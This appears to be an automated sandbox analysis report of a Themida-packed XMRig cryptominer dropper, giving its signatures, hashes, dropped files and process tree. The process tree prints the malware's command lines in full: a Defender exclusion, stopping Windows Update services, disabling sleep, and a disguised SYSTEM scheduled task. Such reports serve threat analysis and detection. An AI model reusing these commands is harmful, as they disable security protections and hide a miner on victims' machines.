Analysis

  • max time kernel
    300s
  • max time network
    297s
  • platform
    windows10-1703_x64
  • resource
    win10-20230703-en
  • resource tags

    arch:x64arch:x86image:win10-20230703-enlocale:en-usos:windows10-1703-x64system
  • submitted
    08/08/2023, 04:06

General

  • Target

    cb95df0d30e07f020cf18517f7a698e6e0a7a3a60eb01e8e5aca16f1f5b8eb68.exe

  • Size

    8.9MB

  • MD5

    e2df1fca37cff12eb333d1d11d11d5af

  • SHA1

    21a2733360dbd70672448da47843cf6675087d59

  • SHA256

    cb95df0d30e07f020cf18517f7a698e6e0a7a3a60eb01e8e5aca16f1f5b8eb68

  • SHA512

    9746086f68101b73c92805b18483d3e69d45052abddcf12a9da515d91f023febd3a9385b18ded0ff71e80da1f685b854bceb4f47da8baef23d22a0de0dd33e31

  • SSDEEP

    196608:6WOiyabx20kSkWfWTsO8OFyaKnMFkd3EvOdytLmS+SLgKckF3HNo3mNssMryk:PxsHsGgaKbdCOQRmTZpkQv

Malware Config

Signatures

  • Suspicious use of NtCreateUserProcessOtherParentProcess 11 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 23 IoCs
  • Drops file in Drivers directory 2 IoCs
  • Stops running service(s) 3 TTPs
  • Executes dropped EXE 1 IoCs
  • Themida packer 23 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Drops file in System32 directory 3 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 2 IoCs
  • Launches sc.exe 10 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 38 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:3196
      • C:\Users\Admin\AppData\Local\Temp\cb95df0d30e07f020cf18517f7a698e6e0a7a3a60eb01e8e5aca16f1f5b8eb68.exe
        "C:\Users\Admin\AppData\Local\Temp\cb95df0d30e07f020cf18517f7a698e6e0a7a3a60eb01e8e5aca16f1f5b8eb68.exe"
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Drops file in Drivers directory
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Drops file in Program Files directory
        • Suspicious behavior: EnumeratesProcesses
        PID:4896
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4992
      • C:\Windows\System32\cmd.exe
        C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2940
        • C:\Windows\System32\sc.exe
          sc stop UsoSvc
          3⤵
          • Launches sc.exe
          PID:4572
        • C:\Windows\System32\sc.exe
          sc stop WaaSMedicSvc
          3⤵
          • Launches sc.exe
          PID:4204
        • C:\Windows\System32\sc.exe
          sc stop wuauserv
          3⤵
          • Launches sc.exe
          PID:4848
        • C:\Windows\System32\sc.exe
          sc stop bits
          3⤵
          • Launches sc.exe
          PID:2344
        • C:\Windows\System32\sc.exe
          sc stop dosvc
          3⤵
          • Launches sc.exe
          PID:4168
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#fyhjjuwy#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3560
      • C:\Windows\System32\cmd.exe
        C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:3728
        • C:\Windows\System32\powercfg.exe
          powercfg /x -hibernate-timeout-ac 0
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:1444
        • C:\Windows\System32\powercfg.exe
          powercfg /x -hibernate-timeout-dc 0
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:4464
        • C:\Windows\System32\powercfg.exe
          powercfg /x -standby-timeout-ac 0
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:4176
        • C:\Windows\System32\powercfg.exe
          powercfg /x -standby-timeout-dc 0
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:1412
      • C:\Windows\System32\schtasks.exe
        C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
        2⤵
          PID:5028
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
          2⤵
          • Drops file in System32 directory
          • Modifies data under HKEY_USERS
          • Suspicious behavior: EnumeratesProcesses
          PID:5000
        • C:\Windows\System32\cmd.exe
          C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:4856
          • C:\Windows\System32\sc.exe
            sc stop UsoSvc
            3⤵
            • Launches sc.exe
            PID:3856
          • C:\Windows\System32\sc.exe
            sc stop WaaSMedicSvc
            3⤵
            • Launches sc.exe
            PID:5016
          • C:\Windows\System32\sc.exe
            sc stop wuauserv
            3⤵
            • Launches sc.exe
            PID:2552
          • C:\Windows\System32\sc.exe
            sc stop bits
            3⤵
            • Launches sc.exe
            PID:2888
          • C:\Windows\System32\sc.exe
            sc stop dosvc
            3⤵
            • Launches sc.exe
            PID:2800
        • C:\Windows\System32\cmd.exe
          C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:4424
          • C:\Windows\System32\powercfg.exe
            powercfg /x -hibernate-timeout-ac 0
            3⤵
              PID:4512
            • C:\Windows\System32\powercfg.exe
              powercfg /x -hibernate-timeout-dc 0
              3⤵
                PID:5072
              • C:\Windows\System32\powercfg.exe
                powercfg /x -standby-timeout-ac 0
                3⤵
                  PID:4156
                • C:\Windows\System32\powercfg.exe
                  powercfg /x -standby-timeout-dc 0
                  3⤵
                    PID:4820
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#fyhjjuwy#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
                  2⤵
                  • Drops file in System32 directory
                  • Modifies data under HKEY_USERS
                  • Suspicious behavior: EnumeratesProcesses
                  PID:1360
                • C:\Windows\System32\conhost.exe
                  C:\Windows\System32\conhost.exe
                  2⤵
                    PID:660
                  • C:\Windows\explorer.exe
                    C:\Windows\explorer.exe
                    2⤵
                    • Suspicious behavior: EnumeratesProcesses
                    PID:1060
                • C:\Program Files\Google\Chrome\updater.exe
                  "C:\Program Files\Google\Chrome\updater.exe"
                  1⤵
                  • Suspicious use of NtCreateUserProcessOtherParentProcess
                  • Drops file in Drivers directory
                  • Executes dropped EXE
                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                  • Suspicious use of SetThreadContext
                  • Drops file in Program Files directory
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of WriteProcessMemory
                  PID:5044

                Network

                      MITRE ATT&CK Enterprise v15

                      Replay Monitor

                      Loading Replay Monitor...

                      Downloads

                      • C:\Program Files\Google\Chrome\updater.exe

                        Filesize

                        8.9MB

                        MD5

                        e2df1fca37cff12eb333d1d11d11d5af

                        SHA1

                        21a2733360dbd70672448da47843cf6675087d59

                        SHA256

                        cb95df0d30e07f020cf18517f7a698e6e0a7a3a60eb01e8e5aca16f1f5b8eb68

                        SHA512

                        9746086f68101b73c92805b18483d3e69d45052abddcf12a9da515d91f023febd3a9385b18ded0ff71e80da1f685b854bceb4f47da8baef23d22a0de0dd33e31

                      • C:\Program Files\Google\Chrome\updater.exe

                        Filesize

                        8.9MB

                        MD5

                        e2df1fca37cff12eb333d1d11d11d5af

                        SHA1

                        21a2733360dbd70672448da47843cf6675087d59

                        SHA256

                        cb95df0d30e07f020cf18517f7a698e6e0a7a3a60eb01e8e5aca16f1f5b8eb68

                        SHA512

                        9746086f68101b73c92805b18483d3e69d45052abddcf12a9da515d91f023febd3a9385b18ded0ff71e80da1f685b854bceb4f47da8baef23d22a0de0dd33e31

                      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                        Filesize

                        3KB

                        MD5

                        ad5cd538ca58cb28ede39c108acb5785

                        SHA1

                        1ae910026f3dbe90ed025e9e96ead2b5399be877

                        SHA256

                        c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033

                        SHA512

                        c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13

                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                        Filesize

                        1KB

                        MD5

                        79dc726cf3f3d480e77e5552b3d5ca34

                        SHA1

                        7106a9301c137f43bf4c3410276874c051867142

                        SHA256

                        285775224b0349d5ecdfdda7a7aa5adb5b7c02f18e3c018ff5cf633a6caf6761

                        SHA512

                        18e4bc2c5cd718250254f76c9661a4e2c11af807ebd884b67be12a82c2174c3c208f1f2dc5d77f66cc0aec08f7e666d247a9efc4d9461702709586ecefa4c86f

                      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_s4gbeh2u.mnm.ps1

                        Filesize

                        1B

                        MD5

                        c4ca4238a0b923820dcc509a6f75849b

                        SHA1

                        356a192b7913b04c54574d18c28d46e6395428ab

                        SHA256

                        6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

                        SHA512

                        4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

                      • C:\Windows\System32\drivers\etc\hosts

                        Filesize

                        3KB

                        MD5

                        00930b40cba79465b7a38ed0449d1449

                        SHA1

                        4b25a89ee28b20ba162f23772ddaf017669092a5

                        SHA256

                        eda1aae2c8fce700e3bdbe0186cf3db88400cf0ac13ec736e84dacba61628a01

                        SHA512

                        cbe4760ec041e7da7ab86474d5c82969cfccb8ccc5dbdac9436862d5b1b86210ab90754d3c8da5724176570d8842e57a716a281acba8719e90098a6f61a17c62

                      • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                        Filesize

                        3KB

                        MD5

                        811d351aabd7b708fef7683cf5e29e15

                        SHA1

                        06fd89e5a575f45d411cf4b3a2d277e642e73dbb

                        SHA256

                        0915139ab02088c3932bcc062ce22d4e9c81aa6df0eacd62900d73d7ad2d3b18

                        SHA512

                        702d847c2aa3c9526ddf34249de06e58f5e3182d6ef66f77ddbdbbd2e9836026da6eacac2c892cf186d79bdc227a85c14f493b746c03233ef8820d981721c70a

                      • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                        Filesize

                        1KB

                        MD5

                        302a7c179ef577c237c5418fb770fd27

                        SHA1

                        343ef00d1357a8d2ff6e1143541a8a29435ed30c

                        SHA256

                        9e6b50764916c21c41d6e7c4999bdf27120c069ec7a9268100e1ce5df845149f

                        SHA512

                        f2472371a322d0352772defb959ea0a9da0d5ca8f412f6abafac2e6547bcc8a53394a6fb81b488521fc256bfc9f3205d92c6b69d6d139bdb260fb46578946699

                      • memory/660-730-0x00007FF66FAF0000-0x00007FF66FB1A000-memory.dmp

                        Filesize

                        168KB

                      • memory/660-722-0x00007FF66FAF0000-0x00007FF66FB1A000-memory.dmp

                        Filesize

                        168KB

                      • memory/1060-725-0x00007FF7254D0000-0x00007FF725CBF000-memory.dmp

                        Filesize

                        7.9MB

                      • memory/1060-728-0x00007FF7254D0000-0x00007FF725CBF000-memory.dmp

                        Filesize

                        7.9MB

                      • memory/1060-745-0x00007FF7254D0000-0x00007FF725CBF000-memory.dmp

                        Filesize

                        7.9MB

                      • memory/1060-743-0x00007FF7254D0000-0x00007FF725CBF000-memory.dmp

                        Filesize

                        7.9MB

                      • memory/1060-741-0x00007FF7254D0000-0x00007FF725CBF000-memory.dmp

                        Filesize

                        7.9MB

                      • memory/1060-739-0x00007FF7254D0000-0x00007FF725CBF000-memory.dmp

                        Filesize

                        7.9MB

                      • memory/1060-737-0x00007FF7254D0000-0x00007FF725CBF000-memory.dmp

                        Filesize

                        7.9MB

                      • memory/1060-735-0x00007FF7254D0000-0x00007FF725CBF000-memory.dmp

                        Filesize

                        7.9MB

                      • memory/1060-733-0x00007FF7254D0000-0x00007FF725CBF000-memory.dmp

                        Filesize

                        7.9MB

                      • memory/1060-731-0x00007FF7254D0000-0x00007FF725CBF000-memory.dmp

                        Filesize

                        7.9MB

                      • memory/1060-749-0x00007FF7254D0000-0x00007FF725CBF000-memory.dmp

                        Filesize

                        7.9MB

                      • memory/1060-761-0x00007FF7254D0000-0x00007FF725CBF000-memory.dmp

                        Filesize

                        7.9MB

                      • memory/1060-751-0x00007FF7254D0000-0x00007FF725CBF000-memory.dmp

                        Filesize

                        7.9MB

                      • memory/1060-753-0x00007FF7254D0000-0x00007FF725CBF000-memory.dmp

                        Filesize

                        7.9MB

                      • memory/1060-723-0x00007FF7254D0000-0x00007FF725CBF000-memory.dmp

                        Filesize

                        7.9MB

                      • memory/1060-755-0x00007FF7254D0000-0x00007FF725CBF000-memory.dmp

                        Filesize

                        7.9MB

                      • memory/1060-715-0x00000000009E0000-0x0000000000A00000-memory.dmp

                        Filesize

                        128KB

                      • memory/1060-747-0x00007FF7254D0000-0x00007FF725CBF000-memory.dmp

                        Filesize

                        7.9MB

                      • memory/1060-757-0x00007FF7254D0000-0x00007FF725CBF000-memory.dmp

                        Filesize

                        7.9MB

                      • memory/1060-767-0x00007FF7254D0000-0x00007FF725CBF000-memory.dmp

                        Filesize

                        7.9MB

                      • memory/1060-765-0x00007FF7254D0000-0x00007FF725CBF000-memory.dmp

                        Filesize

                        7.9MB

                      • memory/1060-763-0x00007FF7254D0000-0x00007FF725CBF000-memory.dmp

                        Filesize

                        7.9MB

                      • memory/1060-759-0x00007FF7254D0000-0x00007FF725CBF000-memory.dmp

                        Filesize

                        7.9MB

                      • memory/1360-708-0x00007FFBB9210000-0x00007FFBB9BFC000-memory.dmp

                        Filesize

                        9.9MB

                      • memory/1360-669-0x000001C3C8C60000-0x000001C3C8C7C000-memory.dmp

                        Filesize

                        112KB

                      • memory/1360-546-0x000001C3C8810000-0x000001C3C8820000-memory.dmp

                        Filesize

                        64KB

                      • memory/1360-545-0x000001C3C8810000-0x000001C3C8820000-memory.dmp

                        Filesize

                        64KB

                      • memory/1360-451-0x00007FF7B7870000-0x00007FF7B7880000-memory.dmp

                        Filesize

                        64KB

                      • memory/1360-694-0x00007FFBB9210000-0x00007FFBB9BFC000-memory.dmp

                        Filesize

                        9.9MB

                      • memory/1360-695-0x000001C3C8810000-0x000001C3C8820000-memory.dmp

                        Filesize

                        64KB

                      • memory/1360-698-0x000001C3C8810000-0x000001C3C8820000-memory.dmp

                        Filesize

                        64KB

                      • memory/1360-431-0x000001C3C8810000-0x000001C3C8820000-memory.dmp

                        Filesize

                        64KB

                      • memory/1360-429-0x000001C3C8810000-0x000001C3C8820000-memory.dmp

                        Filesize

                        64KB

                      • memory/1360-427-0x00007FFBB9210000-0x00007FFBB9BFC000-memory.dmp

                        Filesize

                        9.9MB

                      • memory/1360-699-0x000001C3C8810000-0x000001C3C8820000-memory.dmp

                        Filesize

                        64KB

                      • memory/3560-197-0x00007FFBB9210000-0x00007FFBB9BFC000-memory.dmp

                        Filesize

                        9.9MB

                      • memory/3560-237-0x00007FFBB9210000-0x00007FFBB9BFC000-memory.dmp

                        Filesize

                        9.9MB

                      • memory/3560-198-0x000001236EB00000-0x000001236EB10000-memory.dmp

                        Filesize

                        64KB

                      • memory/3560-200-0x000001236EB00000-0x000001236EB10000-memory.dmp

                        Filesize

                        64KB

                      • memory/3560-216-0x000001236EB00000-0x000001236EB10000-memory.dmp

                        Filesize

                        64KB

                      • memory/4896-138-0x00007FFBD2590000-0x00007FFBD263E000-memory.dmp

                        Filesize

                        696KB

                      • memory/4896-136-0x00007FFB80000000-0x00007FFB80002000-memory.dmp

                        Filesize

                        8KB

                      • memory/4896-123-0x00007FFB80000000-0x00007FFB80002000-memory.dmp

                        Filesize

                        8KB

                      • memory/4896-124-0x00007FFBD1C30000-0x00007FFBD1E79000-memory.dmp

                        Filesize

                        2.3MB

                      • memory/4896-125-0x00007FFBD2590000-0x00007FFBD263E000-memory.dmp

                        Filesize

                        696KB

                      • memory/4896-126-0x00007FFBD2590000-0x00007FFBD263E000-memory.dmp

                        Filesize

                        696KB

                      • memory/4896-127-0x00007FFB80030000-0x00007FFB80031000-memory.dmp

                        Filesize

                        4KB

                      • memory/4896-128-0x00007FFBD4EC0000-0x00007FFBD509B000-memory.dmp

                        Filesize

                        1.9MB

                      • memory/4896-129-0x00007FF600860000-0x00007FF6018D8000-memory.dmp

                        Filesize

                        16.5MB

                      • memory/4896-130-0x00007FF600860000-0x00007FF6018D8000-memory.dmp

                        Filesize

                        16.5MB

                      • memory/4896-131-0x00007FF600860000-0x00007FF6018D8000-memory.dmp

                        Filesize

                        16.5MB

                      • memory/4896-132-0x00007FF600860000-0x00007FF6018D8000-memory.dmp

                        Filesize

                        16.5MB

                      • memory/4896-133-0x00007FF600860000-0x00007FF6018D8000-memory.dmp

                        Filesize

                        16.5MB

                      • memory/4896-134-0x00007FF600860000-0x00007FF6018D8000-memory.dmp

                        Filesize

                        16.5MB

                      • memory/4896-135-0x00007FF600860000-0x00007FF6018D8000-memory.dmp

                        Filesize

                        16.5MB

                      • memory/4896-187-0x00007FF600860000-0x00007FF6018D8000-memory.dmp

                        Filesize

                        16.5MB

                      • memory/4896-137-0x00007FFBD1C30000-0x00007FFBD1E79000-memory.dmp

                        Filesize

                        2.3MB

                      • memory/4896-140-0x00007FFBD4EC0000-0x00007FFBD509B000-memory.dmp

                        Filesize

                        1.9MB

                      • memory/4896-122-0x00007FF600860000-0x00007FF6018D8000-memory.dmp

                        Filesize

                        16.5MB

                      • memory/4896-239-0x00007FF600860000-0x00007FF6018D8000-memory.dmp

                        Filesize

                        16.5MB

                      • memory/4896-240-0x00007FFBD4EC0000-0x00007FFBD509B000-memory.dmp

                        Filesize

                        1.9MB

                      • memory/4896-241-0x00007FFBD1C30000-0x00007FFBD1E79000-memory.dmp

                        Filesize

                        2.3MB

                      • memory/4896-242-0x00007FFBD2590000-0x00007FFBD263E000-memory.dmp

                        Filesize

                        696KB

                      • memory/4992-164-0x00000272D49F0000-0x00000272D4A00000-memory.dmp

                        Filesize

                        64KB

                      • memory/4992-188-0x00000272D49F0000-0x00000272D4A00000-memory.dmp

                        Filesize

                        64KB

                      • memory/4992-151-0x00000272ED220000-0x00000272ED296000-memory.dmp

                        Filesize

                        472KB

                      • memory/4992-147-0x00000272D49F0000-0x00000272D4A00000-memory.dmp

                        Filesize

                        64KB

                      • memory/4992-148-0x00000272D49F0000-0x00000272D4A00000-memory.dmp

                        Filesize

                        64KB

                      • memory/4992-146-0x00007FFBB9210000-0x00007FFBB9BFC000-memory.dmp

                        Filesize

                        9.9MB

                      • memory/4992-191-0x00007FFBB9210000-0x00007FFBB9BFC000-memory.dmp

                        Filesize

                        9.9MB

                      • memory/4992-145-0x00000272ED070000-0x00000272ED092000-memory.dmp

                        Filesize

                        136KB

                      • memory/5000-330-0x0000020DD93B0000-0x0000020DD93BA000-memory.dmp

                        Filesize

                        40KB

                      • memory/5000-421-0x00007FFBB9210000-0x00007FFBB9BFC000-memory.dmp

                        Filesize

                        9.9MB

                      • memory/5000-267-0x00007FFBB9210000-0x00007FFBB9BFC000-memory.dmp

                        Filesize

                        9.9MB

                      • memory/5000-269-0x0000020DD91A0000-0x0000020DD91B0000-memory.dmp

                        Filesize

                        64KB

                      • memory/5000-270-0x0000020DD91A0000-0x0000020DD91B0000-memory.dmp

                        Filesize

                        64KB

                      • memory/5000-289-0x00007FF7B7F10000-0x00007FF7B7F20000-memory.dmp

                        Filesize

                        64KB

                      • memory/5000-290-0x0000020DD9180000-0x0000020DD919C000-memory.dmp

                        Filesize

                        112KB

                      • memory/5000-297-0x0000020DD95B0000-0x0000020DD9669000-memory.dmp

                        Filesize

                        740KB

                      • memory/5000-388-0x0000020DD91A0000-0x0000020DD91B0000-memory.dmp

                        Filesize

                        64KB

                      • memory/5000-387-0x0000020DD91A0000-0x0000020DD91B0000-memory.dmp

                        Filesize

                        64KB

                      • memory/5044-252-0x00007FF674D10000-0x00007FF675D88000-memory.dmp

                        Filesize

                        16.5MB

                      • memory/5044-714-0x00007FF674D10000-0x00007FF675D88000-memory.dmp

                        Filesize

                        16.5MB

                      • memory/5044-248-0x00007FFBD1C30000-0x00007FFBD1E79000-memory.dmp

                        Filesize

                        2.3MB

                      • memory/5044-249-0x00007FFBD2590000-0x00007FFBD263E000-memory.dmp

                        Filesize

                        696KB

                      • memory/5044-246-0x00007FFBD2590000-0x00007FFBD263E000-memory.dmp

                        Filesize

                        696KB

                      • memory/5044-251-0x00007FFB80030000-0x00007FFB80031000-memory.dmp

                        Filesize

                        4KB

                      • memory/5044-717-0x00007FFBD1C30000-0x00007FFBD1E79000-memory.dmp

                        Filesize

                        2.3MB

                      • memory/5044-250-0x00007FFBD4EC0000-0x00007FFBD509B000-memory.dmp

                        Filesize

                        1.9MB

                      • memory/5044-693-0x00007FF674D10000-0x00007FF675D88000-memory.dmp

                        Filesize

                        16.5MB

                      • memory/5044-716-0x00007FFBD2590000-0x00007FFBD263E000-memory.dmp

                        Filesize

                        696KB

                      • memory/5044-291-0x00007FF674D10000-0x00007FF675D88000-memory.dmp

                        Filesize

                        16.5MB

                      • memory/5044-247-0x00007FFB80000000-0x00007FFB80002000-memory.dmp

                        Filesize

                        8KB

                      • memory/5044-245-0x00007FF674D10000-0x00007FF675D88000-memory.dmp

                        Filesize

                        16.5MB

                      • memory/5044-254-0x00007FF674D10000-0x00007FF675D88000-memory.dmp

                        Filesize

                        16.5MB

                      • memory/5044-255-0x00007FF674D10000-0x00007FF675D88000-memory.dmp

                        Filesize

                        16.5MB

                      • memory/5044-253-0x00007FF674D10000-0x00007FF675D88000-memory.dmp

                        Filesize

                        16.5MB

                      • memory/5044-263-0x00007FFBD4EC0000-0x00007FFBD509B000-memory.dmp

                        Filesize

                        1.9MB

                      • memory/5044-261-0x00007FFBD1C30000-0x00007FFBD1E79000-memory.dmp

                        Filesize

                        2.3MB

                      • memory/5044-260-0x00007FFB80000000-0x00007FFB80002000-memory.dmp

                        Filesize

                        8KB

                      • memory/5044-259-0x00007FFBD2590000-0x00007FFBD263E000-memory.dmp

                        Filesize

                        696KB

                      • memory/5044-258-0x00007FF674D10000-0x00007FF675D88000-memory.dmp

                        Filesize

                        16.5MB

                      • memory/5044-257-0x00007FF674D10000-0x00007FF675D88000-memory.dmp

                        Filesize

                        16.5MB

                      • memory/5044-256-0x00007FF674D10000-0x00007FF675D88000-memory.dmp

                        Filesize

                        16.5MB